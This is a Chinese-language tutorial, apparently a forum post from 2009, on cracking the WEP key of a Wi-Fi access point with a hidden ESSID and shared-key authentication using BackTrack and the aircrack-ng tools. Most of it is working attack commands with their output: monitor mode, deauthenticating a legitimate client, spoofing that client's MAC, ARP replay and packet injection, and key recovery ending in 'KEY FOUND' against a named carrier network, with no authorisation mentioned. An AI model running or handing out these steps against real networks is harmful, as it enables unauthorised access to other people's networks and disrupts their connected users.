破解隐藏ESSID和共享密钥认证的WEP密码
序言:欲成功破解隐藏ESSID和共享密钥认证的WEP密码,必需有合法的客户端;否则一切徒劳无功。以下是本人经过多次实践获得的经验,与各位兄弟姐妹分享。
root@bt:~# ifconfig -a eth0 Link encap:Ethernet HWaddr 00:03:0D:65:EC:EF BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:19 Base address:0xa000 eth1 Link encap:UNSPEC HWaddr 00-15-F2-00-00-00 UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1 RX packets:289685 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:11280435 (10.7 MiB) TX bytes:0 (0.0 b) Interrupt:11 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) |
1. 此命令用于查找自己无线网卡的MAC地址及在BT下的监听端口,也可以理解为无线网卡的别名。
注:这里获得的信息是MAC地址为00-15-F2-00-00-00,监听端口为eth1。
root@bt:~# ifconfig -a eth1 eth1 Link encap:UNSPEC HWaddr 00-15-F2-00-00-00 UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1 RX packets:295529 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:11545931 (11.0 MiB) TX bytes:0 (0.0 b) Interrupt:11 |
2. 此命令用于激活无线网卡的监听端口eth1。
root@bt:~# airmon-ng start eth1 1 Interface Chipset Driver eth1 Broadcom bcm43xx (monitor mode enabled) |
3. 此命令用于将无线网卡置于monitor(监听)模式,并且指定监控的频道。
注:此处的eth1为第一步中获得的监听端口;1为无线AP的频道,可用相应软件获得。
root@bt:~# airodump-ng --ivs -w 0523 -c 1 eth1 [CH 1 ][ Elapsed: 4 s ][ 2009-05-23 09:40] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1E:40:87:45:BB 0 100 61 0 0 1 54 WEP WEP <length: 13> BSSID STATION PWR Rate Lost Packets Probes |
4. 此命令用于获得无线AP的MAC地址及名称。此处无线AP的MAC地址为00:1E:40:87:45:BB,因为无线AP设置了隐藏ESSID,所以此命令尚无法获得AP名称。
注:无线AP的MAC地址即BSSID下面的内容,无线AP名称为ESSID下面的内容。
[CH 1 ][ Elapsed: 3 mins ][ 2009-05-23 1 09:43 ][ Broken SKA: 00:1E:40:87:45:BB] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1E:40:87:45:BB 0 100 18221 26151 0 1 54 WEP WEP SKA ChinaNet-W4J7 BSSID STATION PWR Rate Lost Packets Probes 00:1E:40:87:45:BB 00:21:5D:36:94:04 0 0- 0 48 11621 ChinaNet-W4J7 |
5. 当ESSID被隐藏时,可用aireplay-ng -0 1 -a 00:1E:40:87:45:BB -c 00:21:5D:36:94:04 eth1来获得无线AP的名称。
注:00:1E:40:87:45:BB为无线AP的MAC地址,00:21:5D:36:94:04为合法客户端的MAC地址,eth1为第一步中获得的监听端口名称。
其实只要有合法的客户端连上了无线AP,其ESSID会自动显示出来,可以不用上述命令获得ESSID;所以此命令可以不执行,待合法客户端自己连上无线AP,自动获得无线AP的ESSID。
root@bt:~# aireplay-ng -3 -b 001e408745bb -h 00215d369404 eth1 The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h). ifconfig eth1 hw ether 00:21:5D:36:94:04 09:41:37 Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1 Saving ARP requests in replay_arp-0523-094137.cap You should also start airodump-ng to capture replies. Notice: got a deauth/disassoc packet. Is the source MAC associated ? Notice: got a deauth/disassoc packet. Is the source MAC associated ? …… Read 854654 packets (got 23571 ARP requests and 259428 ACKs), sent 352396 packets...(500 pps) |
6. 此命令用于获得破解的数据包。
注:00:1E:40:87:45:BB为无线AP的MAC地址,00:21:5D:36:94:04为合法客户端的MAC地址,eth1为第一步中获得的监听端口名称。
root@bt:~# aireplay-ng -2 -x 1024 eth1 For information, no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified. Using the device MAC (00:15:F2:00:00:00) Read 8431 packets... Size: 368, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1E:40:87:45:BB Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:21:5D:36:94:04 0x0000: 0841 2c00 001e 4087 45bb 0021 5d36 9404 .A,...@.E..!]6.. 0x0010: ffff ffff ffff 704d 0300 0000 afd9 860a ......pM........ 0x0020: 5954 8dd4 07d4 633f 0858 b8eb 9331 b035 YT....c?.X...1.5 0x0030: 5fbb fc0f e087 e0f0 4e6b dcf9 9fda eadd _.......Nk...... 0x0040: 8f61 a8ca 0e2f d955 e7fa bfc9 8200 29e2 .a.../.U......). 0x0050: ec0c 8398 063b df69 3ce0 3035 ccd7 68d7 .....;.i<.05..h. 0x0060: eb5d 1a5b 75cb 6d84 7b83 e057 abab c292 .].[u.m.{..W.... 0x0070: a4bd 49c3 31aa ffa0 5793 adb1 6d17 2b1a ..I.1...W...m.+. 0x0080: 6e41 898c e65b 2332 7e2c 4f2f 0640 0647 nA...[#2~,O/.@.G 0x0090: baea faaa 995d 9b7f 2efb 5da6 66d8 5971 .....]...].f.Yq 0x00a0: 336b 9b49 c1f6 8736 fe2b b2ee 007b c71b 3k.I...6.+...{.. 0x00b0: e7ba 51c5 c70f d31f 97d8 737f 3bda 00f6 ..Q.......s;... 0x00c0: 760e 64cf b112 b2b9 44a0 d9a7 3349 c88b v.d.....D...3I.. 0x00d0: 551f 0780 3817 84e8 a2ba b6b2 4b95 2a86 U...8.......K.*. --- CUT --- Use this packet ? y Saving chosen packet in replay_src-0523-095442.cap You should also start airodump-ng to capture replies. |
7. 此命令用于攻击无线AP,此命令开始执行时,会捕获一个数据包,按Y,接着执行攻击。捕获的数据包如果是正确的,可以看见第四步窗口中的DATA下面的数字迅速猛涨。
注:-x后面的1024为攻击速度,eth1为第一步中获得的监听端口名称。
root@bt:~# aircrack-ng -n 64 *.ivs Opening 0523-01.ivs Read 7801 packets. # BSSID ESSID Encryption 1 00:1E:40:87:45:BB ChinaNet-W4J7 WEP (7800 IVs) Choosing first network as target. Opening 0523-01.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 7800 ivs. Aircrack-ng 1.0 rc1 r1085 [00:02:56] Tested 261076 keys (got 16216 IVs) KB depth byte(vote) 0 5/ 34 07(20480) 4B(20480) 89(20480) 11(20224) 1B(20224) 1 4/ 12 96(20736) 7A(20224) B7(19968) C1(19968) 8A(19712) 2 0/ 7 21(23040) AD(22016) 9A(20736) F7(20480) 2A(20480) 3 8/ 11 09(19968) 0F(19712) 50(19712) 58(19712) 96(19712) 4 2/ 9 88(22016) 0E(21760) 28(21760) C4(20736) 70(20736) KEY FOUND! [ 07:96:21:92:88 ] StartingDecrypted correctly: 100%s. |
8. 当第四步中的DATA达到10000以上时,新开窗口,尝试破解无线AP密码。
注:-n后面的64表示密码位数,如果不知道具体的位数,可用aircrack-ng *.ivs命令破解,让命令自动判断位数并进行破解。
下面的这个窗口报告的是与无线路由器握手的命令,即连接无线AP的命令,本人并使用此命令就已成功破解了无线AP密码。所以个人以为此命令和其他破解教程中说到的许多命令一样,并不是每个命令都需要执行才能成功破解密码。
root@bt:~# aireplay-ng -1 0 -e ChinaNet-W4J7 -a 001e408745bb -h 00215d369404 eth1 The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h). ifconfig eth1 hw ether 00:21:5D:36:94:04 09:46:44 Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1 09:46:44 Sending Authentication Request (Open System) [ACK] 09:46:44 Switching to shared key authentication Read 5247 packets... 09:54:42 Sending Authentication Request (Shared Key) [ACK] 09:54:42 Authentication 1/2 successful 09:54:42 You should specify a xor file (-y) with at least 151 keystreambytes 09:54:42 Trying fragmented shared key fake auth. 09:54:42 Sending encrypted challenge. [ACK] 09:54:42 Got a deauthentication packet! (Waiting 3 seconds) …… 10:11:15 Sending Authentication Request (Shared Key) [ACK] 10:11:17 Sending Authentication Request (Shared Key) Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver/card doesn't support injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * You're too far from the AP. Get closer, or lower the transmit rate. root@bt:~# |
总结:经过本人多次实践,欲破解隐藏了ESSID或采用共享方式的WEP密码,必须有合法的客户端。大家看完我的教程,其中的MAC地址用的都是合法客户端的地址,一次都未使用到本人无线网卡的MAC地址;所以伪装MAC地址这一步在有合法客户端的地址时是可以省略的。还有数据量丰富的时候,即DATA数据猛涨的时候,执行完前面四步,就可以直接执行第八个步骤,大多情况下都能成功破解无线AP的密码。